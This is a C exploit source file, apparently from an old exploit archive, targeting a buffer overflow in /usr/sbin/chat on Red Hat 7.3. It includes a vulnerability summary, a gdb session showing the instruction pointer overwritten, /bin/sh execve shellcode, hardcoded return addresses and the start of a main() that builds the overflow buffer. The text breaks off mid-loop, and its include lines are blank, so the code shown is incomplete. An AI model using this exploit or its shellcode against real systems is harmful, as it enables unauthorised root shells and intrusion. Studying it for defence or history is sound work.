Whackerz #1

Chat Xploit by Polygrithm/Whackerz



/*
 *** Copyright (C) NrAziz
 *
 *** /usr/sbin/chat on Red Hat 7.3
 *
 *** polygrithm@hotmail.com
 * 
 *** Greets to my good friend (Rave)*(Mixter)/Mercy(remember helpforexe??)+(Gorny).
*/


/*
 ********************** VULNERABILITY *************************
* 1. Definition:
*
*      The chat  program defines a conversational exchange between
*      the computer and the modem.  Its  primary  purpose  is  to
*      establish the connection between the Point-to-Point Proto-
*      col Daemon.
*
* 2. Detail:
*      There is a buffer overflow vulnerability in the chat program that can be 
*      exploited by putting data more than 1052, will cause the buffer to over
*      flow.
*
*
* 3. Detection:
*       The chat program on Linux 7.3 was found vulnerable, others not tested. 
*
* [nraziz@nraziz codes]$ gdb /usr/sbin/chat
* GNU gdb Red Hat Linux (5.1.90CVS-5)
* Copyright 2002 Free Software Foundation, Inc.
* GDB is free software, covered by the GNU General Public License, and you are
* welcome to change it and/or distribute copies of it under certain conditions.
* Type "show copying" to see the conditions.
* There is absolutely no warranty for GDB.  Type "show warranty" for details.
* This GDB was configured as "i386-redhat-linux"...
* (no debugging symbols found)...
* (gdb) run `perl -e 'print "A" x 1056'`
* Starting program: /usr/sbin/chat `perl -e 'print "A" x 1056'`
* (no debugging symbols found)...(no debugging symbols found)...
* Program received signal SIGSEGV, Segmentation fault.
* 0x41414141 in ?? ()
* (gdb)info all
* eax            0x804cc88        134532232
* ecx            0x0      0
* edx            0x422    1058
* ebx            0x41414141       1094795585
* esp            0xbffff290       0xbffff290
* ebp            0x41414141       0x41414141
* esi            0x41414141       1094795585
* edi            0x41414141       1094795585
* eip            0x41414141       0x41414141 <---------eip overwritten
* ^^^            ^^^^^^^^^^       ^^^^^^^^^^
*
****************************************************************
*/


/*
 * Exploit Goes Here 
 */


#include 
#include 


char shellcode[] =
"\x31\xc0"              /* xor %eax, %eax       */
"\x50"                  /* push %eax            */
"\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f     */
"\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f     */
"\x89\xe3"              /* mov  %esp,%ebx       */
"\x50"                  /* push %eax            */
"\x53"                  /* push %ebx            */
"\x89\xe1"              /* mov  %esp,%ecx       */
"\x31\xd2"              /* xor  %edx,%edx       */
"\xb0\x0b"              /* mov  $0xb,%al        */
"\xcd\x80";             /* int  $0x80           */


#define BSIZE 1054
//#define RET 1056

/*
 * Both the RET works :)
 */

//#define RET 0xbffffa14
#define RET 0xbffff94c
int main(int argc,char **argv)
{
  int bsize=BSIZE;
  char *buffer;
  int i;
  unsigned long retaddr=RET;
 

if(argc>1) bsize=atoi(argv[1]);

 buffer=(char *)malloc(sizeof(char)*bsize);
 
 fprintf(stderr,"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n");
fprintf(stderr,"chat Xploit for Linux 7.3 by NrAziz\n");
fprintf(stderr,"Using address:%p\n",retaddr);
fprintf(stderr,"N  R  A  Z  I  Z\n");
fprintf(stderr,"polygrithm @ hotmail.com\n");
 fprintf(stderr,"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n");


  for(i=0;i